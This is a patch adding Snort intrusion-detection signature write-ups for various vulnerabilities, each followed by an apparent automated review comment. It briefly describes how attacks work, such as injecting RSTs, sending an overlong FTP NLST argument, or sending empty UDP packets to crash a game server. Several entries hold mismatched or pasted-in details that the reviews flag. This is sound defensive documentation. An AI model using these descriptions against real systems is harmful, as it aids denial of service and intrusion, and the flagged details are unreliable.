+Unknown. Possible attempt to close a session by a third party.
+
+--
+Detailed Information:
+This event indicates that the pre-processor stream4 has detected an out
+of sequence packet with the RST flag set or a packet without the
+required RST and ACK flags in a TCP session. This is abnormal behavior
+and may constitute an attack or be an indicator of spurious activity on
+a network.
+
+--
+Affected Systems:
+	All systems
+
+--
+Attack Scenarios: 
+An attacker may inject packets with the RST flag set into a session in
+an attempt to close the session and cause a Denial of Service (DoS)
+between server and client. This technique may also be used in session
+hijacking attempts.
+
+-- 
+Ease of Attack: 
+Moderate.
+
+-- 
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+-- 
+
+Corrective Action:
+Check the target host for signs of compromise.
+
+Ensure the system is up to date with any appropriate vendor supplied patches.
+
+--
+Contributors:
+Martin Roesch <roesch@sourcefire.com>
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
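Review bot: The trigger in Detailed Information is ambiguous: "an out of sequence packet with the RST flag set or a packet without the required RST and ACK flags" does not say which flag combination stream4 expects, and a bare RST without ACK is valid TCP in some states. Spell out the exact sequence-number and flag conditions the preprocessor checks. Corrective Action ("Check the target host for signs of compromise" and apply patches) does not fit an injected-RST evasion; the useful advice is to check whether the source address is spoofed and to filter it at the border.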
--- /dev/null
+++ b/doc/signatures/1566.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1566
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
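Review bot: Detailed Information, Attack Scenarios and Impact are the generic CGI template and never say which script, parameter or vulnerability sid 1566 matches, so an analyst receiving this event has nothing concrete to check; name the application and the request pattern the rule looks for, and add a reference to Additional References, which is empty. Fix "ona web server" in Detailed Information.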
--- /dev/null
+++ b/doc/signatures/2374.txt
@@ -0,0 +1,61 @@
+Rule:
+
+--
+Sid:
+2374
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer 
+overflow vulnerability associated with Mollensoft Hyperion FTP/Encladus Server Suite NLST 
+command. 
+
+--
+Impact:
+Remote access.  A successful attack may permit the remote execution of 
+arbitrary commands with system privileges.
+
+--
+Detailed Information:
+CesarFTPD offers FTP servers for Windows hosts. A vulnerability exists 
+with the NLST command that can cause a buffer overflow and permit the 
+execution of arbitrary commands with system privileges. The buffer 
+overflow can be caused by supplying an overly long argument to the NLST 
+command.
+
+--
+Affected Systems:
+	Mollensoft Software Enceladus Server Suite 3.9.11
+	Mollensoft Software Hyperion FTP Server 3.5.2
+
+--
+Attack Scenarios:
+An attacker can supply an overly long file argument with the NLST 
+command, causing a buffer overflow.
+
+--
+Ease of Attack:
+Simple.  
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com> 
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
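Review bot: Detailed Information opens with "CesarFTPD offers FTP servers for Windows hosts", but Summary and Affected Systems concern Mollensoft Hyperion FTP Server and Enceladus Server Suite; this sentence looks pasted from another sid and must be corrected. The product is also spelled "Encladus" in Summary and "Enceladus" in Affected Systems. Additional References is empty; cite the advisory for the NLST overflow so the listed versions can be checked.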
--- /dev/null
+++ b/doc/signatures/100000104.txt
@@ -0,0 +1,64 @@
+Rule: 
+
+--
+Sid: 
+100000104
+
+-- 
+Summary: 
+This event is generated when an empty UDP packet is sent to port 27777, where 
+Amp II 3D game servers typically listen.
+
+-- 
+
+Impact: 
+After receiving such a packet, the server will fall into an infinite loop, 
+potentially consuming all resources on the host system. The administrator will 
+need to restart the game server, and possibly the host system.
+
+--
+Detailed Information:
+Amp II 3D servers listen to UDP port 27777 for commands. Upon receiving an 
+empty UDP packet to that port, the server falls into an infinite loop, possibly 
+consuming all resources on the host system. The administrator must restart the 
+game server and/or the host system.
+
+--
+Affected Systems:
+Amp II 3D Game Engine
+Amp Gore: Ultimate Soldier 1.50
+
+--
+
+Attack Scenarios: 
+A script that generates empty UDP packets can be used to perform this attack.
+
+-- 
+
+Ease of Attack: 
+Simple; public exploits exist.
+
+-- 
+
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+-- 
+
+Corrective Action: 
+No known patches or workarounds exist. System administrators may be able to 
+reject these packets at their firewall, depending upon the abilities of the 
+firewall system they use.
+
+--
+Contributors: 
+Alex Kirk <alex.kirk@sourcefire.com>
+
+-- 
+Additional References:
+
+--
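Review bot: Impact and Detailed Information repeat the same infinite-loop sentence almost verbatim; keep the mechanism in Detailed Information and reduce Impact to the consequence (denial of service of the game server and possibly the host). Since the trigger is any empty UDP datagram to port 27777, False Positives should note that a scanner or probe sending a zero-length datagram to that port will also match. Additional References is empty although Ease of Attack says "public exploits exist"; cite the advisory.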
--- /dev/null
+++ b/doc/signatures/119-4.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+119-4
+
+-- 
+Summary: 
+This event is generated when the pre-processor http_inspect
+detects network traffic that may constitute an attack.
+
+-- 
+Impact: 
+Unknown. This may be an attempt to evade an IDS.
+
+--
+Detailed Information:
+Microsoft IIS servers are able to use non-ASCII characters as values
+when decoding UTF-8 values. This is non-standard behavior for a
+webserver and violates RFC recommendations. All non-ASCII values should
+be encoded with a %. This event may indicate an attack against a web
+server or at the least an attempt to evade an IDS.
+
+No web clients encode UTF-8 characters in this way. This is most likely
+a malicious request.
+
+--
+Affected Systems:
+	All Microsoft IIS servers
+
+--
+Attack Scenarios: 
+An attacker merely needs to encode a web request using this non-standard
+format.
+
+-- 
+
+Ease of Attack: 
+Simple. Many exploits exist.
+
+-- 
+
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+-- 
+
+Corrective Action:
+Check the target host for signs of compromise.
+
+Apply any appropriate vendor supplied patches.
+
+--
+Contributors:
+Daniel Roelker <droelker@sourcefire.com> 
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+HTTP IDS Evasions Revisited - Daniel Roelker
+http://docs.idsresearch.org/http_ids_evasions.pdf
+
+--
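Review bot: The first sentence of Detailed Information ("Microsoft IIS servers are able to use non-ASCII characters as values when decoding UTF-8 values") does not say what the preprocessor detects; state plainly that IIS accepts raw bytes above 0x7F in the request URI and decodes them as UTF-8 where a conforming client would percent-encode them, and that this alert fires on such bare bytes. "violates RFC recommendations" should name the RFC. "No web clients encode UTF-8 characters in this way" is a strong absolute next to "False Positives: None Known"; soften it to standards-conforming clients unless it has been verified.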
--- /dev/null
+++ b/doc/signatures/100000495.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid:
+100000495
+--
+Summary:
+This event is generated when an attempt is made to exploit a cross site 
+scripting vulnerability in the "Zeroboard" application running on a webserver.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a cross site 
+scripting vulnerability via the "$file_name" parameter in the "write_ok.php" 
+script used by the "Zeroboard" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to retrieve sensitive data, execute system binaries 
+or malicious code of the attackers choosing.
+
+--
+Affected Systems:
+All systems running CGI applications using Zeroboard
+--
+Attack Scenarios:
+An attacker can supply a malicious link designed to steal information from a 
+user clicking on that link.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+The Cross Site Scripting (XSS) FAQ
+http://www.cgisecurity.com/articles/xss-faq.shtml
+
+--
+
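Review bot: Impact ("system integrity compromise", "administrative access to the server", "execution of arbitrary code") and the second paragraph of Detailed Information ("execute system binaries") are the server-side template and do not fit a cross site scripting issue; the consequence is script execution in the victim's browser and theft of session data, which Attack Scenarios already describes. Rewrite Impact to that and drop the "execute system binaries" paragraph. Affected Systems ("All systems running CGI applications using Zeroboard") should just name Zeroboard and the affected versions if known.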
--- /dev/null
+++ b/doc/signatures/100000449.txt
@@ -0,0 +1,75 @@
+Rule:
+
+--
+Sid:
+100000449
+--
+Summary:
+This event is generated when an attempt is made to exploit an SQL injection 
+vulnerability in the "OfficeFlow" application running on a webserver. Access to 
+the file "files.asp" with SQL commands being passed as the "Project" parameter 
+may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to inject SQL code from a 
+remote machine via the "Project" parameter in the "files.asp" script used by 
+the "OfficeFlow" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to compromise the database backend for the 
+application, the attacker may also be able to execute system binaries or 
+malicious code of their choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using OfficeFlow
+--
+Attack Scenarios:
+An attacker can inject SQL commands to the backend database for an application 
+if user input is not correctly sanitized or checked before passing that input 
+to the database.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+SQL Injection Attack and Defense
+http://www.securitydocs.com/library/3587
+
+--
+
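Review bot: The third paragraph of Detailed Information ("This event is generated when an attempt is made to gain unauthorized access ... validating the credentials of a client host") is the generic CGI template and has nothing to do with SQL injection through the "Project" parameter of files.asp; remove it. "an exploitation attempt has been attempted" in Summary is redundant, and "ona web server" is a typo. Because the rule matches SQL commands inside a request parameter, False Positives should note that legitimate parameter values containing those keywords can trigger it.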
--- /dev/null
+++ b/doc/signatures/100000618.txt
@@ -0,0 +1,74 @@
+Rule:
+
+--
+Sid:
+100000618
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Indexu" application running on a webserver. 
+Access to the file "link_validate.php" using a remote file being passed as the 
+"admin_template_path" parameter may indicate that an exploitation attempt has 
+been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "admin_template_path" parameter in the 
+"link_validate.php" script used by the "Indexu" application running on a 
+webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Indexu
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
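Review bot: Attack Scenarios describes an authentication-bypass scenario ("access an authentication mechanism and supply his/her own credentials") that does not apply to a remote file include; the scenario for this sid is an attacker passing the URL of a file on a host they control in the "admin_template_path" parameter so that link_validate.php includes and executes it. The third paragraph of Detailed Information is the same unrelated template text and should go. "an exploitation attempt has been attempted" in Summary is redundant, "ona web server" is a typo, and Additional References is empty.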
--- /dev/null
+++ b/doc/signatures/2658.txt
@@ -0,0 +1,54 @@
+Rule: 
+
+--
+Sid: 
+2658
+
+-- 
+Summary: 
+This rule is intended to increase the accuracy of rules designed to
+generate events based on attempts to exploit implementations of Secure
+Socket Layer (SSL) version 2.
+
+-- 
+Impact: 
+None. This is a protocol decode rule that does not generate events.
+
+--
+Detailed Information:
+This is a protocol decode rule that does not generate events.
+
+--
+Affected Systems:
+NA
+
+--
+Attack Scenarios: 
+NA
+
+-- 
+Ease of Attack: 
+NA
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+NA
+
+--
+Contributors: 
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
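Review bot: For a rule that "does not generate events", False Positives and False Negatives should read "NA" like the surrounding sections rather than "None Known", since there is no alert to be false about. Summary should also say which SSLv2 rules depend on this decode and how they consume its result, so a reader knows what breaks if it is disabled.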
--- /dev/null
+++ b/doc/signatures/1832.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+1832
+
+--
+Summary:
+This event is generated when activity relating to network chat clients is detected.
+
+--
+Impact:
+Policy Violation. Use of chat clients to communicate with unkown 
+external sources may be against the policy of many organizations.
+
+--
+Detailed Information:
+Instant Messaging (IM) and other chat related client software can allow 
+users to transfer files directly between hosts. This can allow malicious
+users to circumvent the protection offered by a network firewall.
+
+Vulnerabilities in these clients may also allow remote attackers to gain
+unauthorized access to a host. This events indicates that an attempt has
+been made to add a user to the contact list of Mirabilis' ICQ client via
+a specially crafted URI on a website.
+
+Certain versions of Mirabilis' ICQ client do not require user 
+intervention before adding another ICQ user to the contact list. It is 
+possible for a client to be added to the contact list via a specially 
+crafted URI without the user's knowledge.
+
+--
+Attack Scenarios:
+An attacker might utilize this vulnerability in the ICQ client to gain 
+access to a host, then upload a Trojan Horse program to gain control of 
+that host.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Disallow the use of IM clients on the protected network and enforce or 
+implement an organization wide policy on the use of IM clients.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <brian.caswell@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
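Review bot: This file has no "Affected Systems" section; Detailed Information runs straight into Attack Scenarios, and the text only says "Certain versions of Mirabilis' ICQ client", so add the section with the version range. Impact ("Policy Violation") sits oddly beside Attack Scenarios, which describes host compromise via the crafted URI; state both framings or pick the one the rule is meant for. Typos: "This events indicates", "unkown external sources".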
--- /dev/null
+++ b/doc/signatures/2499.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+Sid:
+2499
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in the Microsoft implementation of SSL Version 3.
+
+--
+Impact:
+Denial of Service (DoS).
+--
+Detailed Information:
+A vulnerability exists in the handling of SSL Version 3 requests that
+can be manipulated to cause a DoS condition in various software 
+implementations used on Microsoft operating systems.
+
+The condition exists because of poor error handling routines in the
+Microsoft Secure Sockets Layer (SSL) library. SSL requests containing an
+invalid field, sent to vulnerable systems can cause the affected host to stop 
+handling any further requests.
+
+--
+Affected Systems:
+	Microsoft Windows 2000, 2003 and XP systems using SSL
+
+--
+Attack Scenarios:
+An attcker needs to make an SSL request to an affected system that
+contains an invalid field.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+--
+Contributors:
+Sourcefire Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
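Review bot: Detailed Information says the DoS affects "various software implementations used on Microsoft operating systems" but never names the services, so Affected Systems ("Windows 2000, 2003 and XP systems using SSL") is too vague to act on; list the affected products from the vendor bulletin and cite it in Additional References, which is empty. Fix "attcker" in Attack Scenarios, and add the missing blank line before "--" after Impact to match the other files.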
--- /dev/null
+++ b/doc/signatures/1095.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1095
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
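Review bot: This doc never says what sid 1095 actually matches; Detailed Information concedes "Many known vulnerabilities exist for each implementation and the attack scenarios are legion", which tells an analyst nothing about this event. Name the request pattern the rule looks for and the affected server or application, and add a reference; without that, "False Positives: None known" cannot be justified.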
--- /dev/null
+++ b/doc/signatures/2848.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2848
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure drop_master_repobject
+. This procedure is included in
+sys.dbms_repcat_utl4.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
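Review bot: The procedure name is broken across lines ("vulnerability in the procedure drop_master_repobject" / "." / "This procedure is included in"), leaving a stray period on its own line; join them so it reads "the procedure drop_master_repobject, which is included in sys.dbms_repcat_utl4". Affected Systems reads "Oracle Oracle9i" (duplicated word) and gives no patch level. Additional References is empty although Corrective Action says "Apply the appropriate vendor supplied patch"; cite the Oracle alert.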
--- /dev/null
+++ b/doc/signatures/2482.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+Sid:
+2176
+
+
+--
+Summary:
+This event is generated when an attempt is made to shutdown a service via SMB. 
+
+--
+Impact:
+Serious.
+
+--
+Detailed Information:
+This event indicates that an attempt was made to shutdown a service
+on a system using SMB across the network.
+
+--
+Affected Systems:
+	Microsoft Windows systems.
+
+--
+Attack Scenarios:
+An attacker may try to deny services to other users.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the host for signs of system compromise.
+
+Turn off file and print sharing on the target host.
+
+Use a packet filtering firewall to disallow SMB access to the host from
+sources external to the protected network.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
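Review bot: The file is doc/signatures/2482.txt but the Sid field says 2176; one of them is wrong and the document will be attached to the wrong rule. "Impact: Serious." says nothing; state that a remote caller can stop a service on the target (denial of service), as Attack Scenarios implies. Detailed Information should say which SMB request the rule matches, and Corrective Action's "Turn off file and print sharing on the target host" is not an option where the host legitimately serves SMB; advise restricting which accounts may control services and filtering SMB at the border, which the last paragraph already does.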
--- /dev/null
+++ b/doc/signatures/2446.txt
@@ -0,0 +1,82 @@
+Rule:  
+
+--
+Sid:
+2446
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in multiple versions of Internet Security Systems software.
+
+--
+Impact:
+Serious. Execution of arbitrary code is possible leading to unauthorized 
+access to the affected host. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in the way that multiple ISS products parse ICQ
+messages. This can lead to execution of arbitrary code on hosts using
+the affected products.
+
+Due to insufficient bounds checking when ISS products parse protocol
+fields in ICQ SRV_META_USER data, a buffer overflow condition can be
+exploited to give an attacker the opportunity to execute arbitrary code
+and gain unauthorized administrative access to the host.
+
+It is possible that this condition can be exploited without the need for
+an established and valid ICQ session. The attacker could create packets
+originating from a host on port 4000 and send specially crafted data to 
+exploit the condition.
+
+--
+Affected Systems:
+	RealSecure Network 7.0, XPU 22.11 and prior
+	RealSecure Server Sensor 7.0 XPU 22.11 and prior
+	RealSecure Server Sensor 6.5 for Windows SR 3.10 and prior
+	Proventia A Series XPU 22.11 and prior
+	Proventia G Series XPU 22.11 and prior
+	Proventia M Series XPU 1.9 and prior
+	RealSecure Desktop 7.0 ebl and prior
+	RealSecure Desktop 3.6 ecf and prior
+	RealSecure Guard 3.6 ecf and prior
+	RealSecure Sentry 3.6 ecf and prior
+	BlackICE Agent for Server 3.6 ecf and prior
+	BlackICE PC Protection 3.6 ccf and prior
+	BlackICE Server Protection 3.6 ccf and prior
+
+--
+Attack Scenarios:
+An attacker may send specially crafted packets to a vulnerable system to
+cause the overflow condition to occur.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+Apply the appropriate vendor supplied patches
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+
+--
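Review bot: the Additional References section at the end of this hunk is empty even though Affected Systems lists thirteen specific ISS product and XPU versions; the vendor advisory or vulnerability database entry those "and prior" cut-offs were taken from should be cited so an analyst can verify them. Minor: "Rule:  " on the first line and the "-- " separator before Additional References carry trailing whitespace, and the Corrective Action sentence "Apply the appropriate vendor supplied patches" is missing its period.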
--- /dev/null
+++ b/doc/signatures/1648.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1648
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
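Review bot: nothing in this hunk says which CGI script or vulnerability SID 1648 actually matches; the Summary, Detailed Information and Attack Scenarios are generic text that would fit any web rule and Additional References is empty, so an analyst cannot judge whether a hit is a false positive. Name the script and the advisory it corresponds to. Wording: "running ona web server" should read "on a web server", and "attackers choosing" needs the possessive ("attacker's").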
--- /dev/null
+++ b/doc/signatures/2945.txt
@@ -0,0 +1,66 @@
+Rule:
+
+--
+Sid:
+2945
+
+--
+Summary:
+This event is generated when an attempt is made to shutdown a Windows
+system via SMB. 
+
+--
+Impact:
+Serious.
+
+--
+Detailed Information:
+This event indicates that an attempt was made to shutdown a Windows
+system via SMB across the network.
+
+It may be possible for an attacker to manipulate a Windows system
+from a remote location. Shutting down a system may lead to a Denial of
+Service for the target host.
+
+--
+Affected Systems:
+	Microsoft Windows systems.
+
+--
+Attack Scenarios:
+An attacker may be able to manipulate a target system using SMB. The
+attacker may gain complete control over the affected system.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the host for signs of system compromise.
+
+Turn off file and print sharing on the target host.
+
+Use a packet filtering firewall to disallow SMB access to the host from
+sources external to the protected network.
+
+Disallow remote registry manipulation.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
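Review bot: "False Positives: None known." is unlikely to hold for a rule that fires on a remote shutdown request over SMB, since administrators shut hosts down this way during maintenance; the section should say that shutdowns issued from management hosts will trigger the event and suggest tuning for those sources. The Impact section ("Serious.") gives no detail while Detailed Information already states the concrete effect (denial of service for the target host); the Impact should carry that statement.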
--- /dev/null
+++ b/doc/signatures/1770.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1770
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
